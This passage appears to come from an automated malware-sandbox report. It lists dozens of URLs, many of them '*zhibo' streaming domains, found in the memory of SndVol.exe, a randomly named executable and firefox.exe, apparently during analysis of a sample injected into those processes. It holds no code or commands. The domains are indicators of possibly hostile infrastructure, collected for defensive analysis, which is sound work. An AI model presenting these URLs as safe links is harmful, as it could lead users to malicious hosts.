                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pn
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.linguarama.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.liuyuezhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mediaexpo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mexicolibre.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.miaozhaozhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mibanzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mierzhibo.com/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mijianzhibo.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.minglianzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moneysoft.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mozizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.niuniuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.noscope.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nvdizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pasiones.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pessoas.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pharco.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qigezhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qingtingzhibo.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qiyuezhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qualityoffice.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.radiodrama.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.risna.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sarfa.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sencare.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shalizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sidma.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartmonday.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.startuptalent.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tanhuazhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.testoprime.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thebossclub.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thecakelady.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thecakelady.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thetilt.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thetrees.net
                Source: SndVol.exe, 00000010.00000002.3513023367.000000000630C000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000038EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.togethertime.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.uwrf.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.webcruiser.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.webuyboats.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.westmedical.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.workandhealth.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuhaozhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuyuezhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuyuezhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xianglizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiangxiangzhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiaoaizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiaoqizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xingaizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinghuizhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinghuizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiuchangzhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiupazhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xuanmozhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yanyangzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yechuizhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yewuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yeyanzhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yeyuezhi.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yinhezhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.com
